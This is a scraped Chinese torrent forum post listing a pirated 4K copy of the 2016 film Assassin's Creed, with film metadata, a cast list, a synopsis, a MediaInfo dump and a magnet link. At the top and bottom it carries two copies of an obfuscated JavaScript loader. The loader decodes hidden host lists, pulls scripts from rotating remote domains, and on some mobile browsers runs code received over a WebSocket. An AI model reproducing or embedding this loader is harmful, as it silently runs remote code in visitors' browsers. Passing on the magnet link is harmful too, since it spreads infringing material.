刺客信条[中文字幕].Assassin's.Creed.2016.2160p.WEB-DL.H265.DD2.0.2Audio-bt9527.cc 23.80GB

版主小s 11天前 261

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 刺客信条 / 刺客教条(港 / 台)

◎片 名 Assassin's Creed

◎年 代 2016

◎产 地 美国 / 法国 / 英国 / 中国香港 / 中国台湾 / 马耳他 / 西班牙 / 加拿大

◎类 别 动作 / 科幻 / 历史 / 冒险

◎语 言 英语 / 西班牙语 / 阿拉伯语

◎上映日期 2017-02-24(中国大陆) / 2016-12-21(美国)

◎IMDb链接 https://www.imdb.com/title/tt2094766/

◎豆瓣评分 5.3/10 (98537人评价)

◎豆瓣链接 https://movie.douban.com/subject/11526817/

◎片 长 116分钟

◎导 演 贾斯汀·库泽尔 Justin Kurzel (id:1325342)

◎编 剧 比尔·科拉奇 Bill Collage (id:1343502)

亚当·库珀 Adam Cooper (id:1343501)

迈克尔·莱斯利 Michael Lesslie (id:1353469)

◎演 员 迈克尔·法斯宾德 Michael Fassbender (id:1000010)

玛丽昂·歌迪亚 Marion Cotillard (id:1006955)

杰瑞米·艾恩斯 Jeremy Irons (id:1031216)

布莱丹·格里森 Brendan Gleeson (id:1000078)

夏洛特·兰普林 Charlotte Rampling (id:1007020)

迈克尔·肯尼斯·威廉姆斯 Michael Kenneth Williams (id:1036428)

德尼·梅诺谢 Denis Ménochet (id:1307841)

亚里安妮·拉贝德 Ariane Labed (id:1313012)

赫立德·阿卜杜拉 Khalid Abdalla (id:1316003)

埃茜·戴维斯 Essie Davis (id:1281902)

马蒂亚斯·瓦雷拉 Matias Varela (id:1135870)

卡勒姆·特纳 Callum Turner (id:1328007)

卡洛斯·巴登 Carlos Bardem (id:1277892)

哈维尔·古铁雷斯 Javier Gutiérrez (id:1014537)

霍威克·库区科利安 Hovik Keuchkerian (id:1343538)

米歇尔·H·林 Michelle H. Lin (id:1381706)

胡安·巴勃罗·舒克 Juan Pablo Shuk (id:1142637)

鲁弗斯·赖特 Rufus Wright (id:1368199)

乔·肯纳德 Joe Kennard (id:1428603)

克里斯塔·克拉克 Crystal Clarke (id:1341238)

芙洛·费拉科 Flor Ferraco (id:1367755)

布莱恩·格里森 Brian Gleeson (id:1227388)

格拉姆·柯里 Graham Curry (id:1232609)

珂珂柯尼希 Coco K?nig (id:1354063)

帕特里克·克劳利 Patrick Crowley (id:1382980)

阿诺恩·米尔坎 Arnon Milchan (id:1037087)

李少伟 Philip Lee (id:1384999)

迈克尔·法斯宾德 Michael Fassbender (id:1000010)

杰德·库泽尔 Jed Kurzel (id:1376075)

Daisy Chute Daisy Chute (id:1237578)

亚当·阿卡抛 Adam Arkapaw (id:1328284)

谷雨 Gu Yu (id:1383829)

吉娜·杰 Jina Jay (id:1395105)

瑞恩·艾伦 Ryan Allen (id:1247853)

◎标 签 游戏改编 / 动作 / 美国 / 科幻 / 冒险 / 信仰 / 奇幻 / 2016

◎简 介

卡勒姆·林奇(迈克尔·法斯宾德 饰)在死刑即将执行之前清醒过来,发现他被索菲娅(玛丽昂·歌迪亚 饰)选中,来参加一个能让人类摆脱暴力冲动的计划。虚拟现实机器Animus能让用户体验祖先的记忆,被绑在机器上之后,卡勒姆·林奇意识到他是生活在西班牙宗教法庭时期一位刺客阿圭拉的后裔,他们寻找的是可以控制自由意志的伊甸园苹果。索菲娅在父亲艾伦(杰瑞米·艾恩斯 饰)施加的压力下不情愿地操纵着卡勒姆·林奇回到过去寻找伊甸园苹果在现代世界的下落,威胁着他身体和心理的健康。但在杀手同行穆萨(迈克尔·威廉姆斯 饰)暗示了卡勒姆·林奇,提醒他艾伦有可能动机不纯之后,卡勒姆·林奇开始重新考虑他的行为和动机,而人类自由意志的命运也变得悬而未决……

◎获奖情况 (共1项)

第4届豆瓣电影年度榜单 (2017)

2月最受关注电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Complete name : 刺客信条.Assassin'[email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/mp41)

  7. File size : 23.8 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate : 29.5 Mb/s

  10. Writing application : OurTV Multimedia Platform


  11. Video

  12. ID : 1

  13. Format : HEVC

  14. Format/Info : High Efficiency Video Coding

  15. Format profile : [email protected]@High

  16. Codec ID : hev1

  17. Codec ID/Info : High Efficiency Video Coding

  18. Duration : 1 h 55 min

  19. Bit rate : 28.7 Mb/s

  20. Width : 3 840 pixels

  21. Height : 2 160 pixels

  22. Display aspect ratio : 16:9

  23. Frame rate mode : Variable

  24. Frame rate : 24.960 FPS

  25. Minimum frame rate : 12.500 FPS

  26. Maximum frame rate : 25.000 FPS

  27. Original frame rate : 25.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Bits/(Pixel*Frame) : 0.139

  32. Stream size : 23.2 GiB (97%)

  33. Color range : Limited

  34. Color primaries : BT.709

  35. Transfer characteristics : BT.709

  36. Matrix coefficients : BT.709

  37. Codec configuration box : hvcC


  38. Audio #1

  39. ID : 2

  40. Format : AC-3

  41. Format/Info : Audio Coding 3

  42. Commercial name : Dolby Digital

  43. Codec ID : ac-3

  44. Duration : 1 h 55 min

  45. Bit rate mode : Constant

  46. Bit rate : 384 kb/s

  47. Channel(s) : 2 channels

  48. Channel layout : L R

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 31.250 FPS (1536 SPF)

  51. Compression mode : Lossy

  52. Stream size : 317 MiB (1%)

  53. Title : 英语DD2.0

  54. Language : English

  55. Service kind : Complete Main

  56. Default : Yes

  57. Alternate group : 1


  58. Audio #2

  59. ID : 3

  60. Format : AC-3

  61. Format/Info : Audio Coding 3

  62. Commercial name : Dolby Digital

  63. Codec ID : ac-3

  64. Duration : 1 h 55 min

  65. Bit rate mode : Constant

  66. Bit rate : 384 kb/s

  67. Channel(s) : 2 channels

  68. Channel layout : L R

  69. Sampling rate : 48.0 kHz

  70. Frame rate : 31.250 FPS (1536 SPF)

  71. Compression mode : Lossy

  72. Stream size : 317 MiB (1%)

  73. Title : 国语DD2.0

  74. Language : Chinese

  75. Service kind : Complete Main

  76. Default : No

  77. Alternate group : 1




复制代码


TAGS 动作 冒险 科幻 历史

磁力链:
  • magnet:?xt=urn:btih:C26CA3D7E4635F6C52D426B94E3F2E72BBB0CE84

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};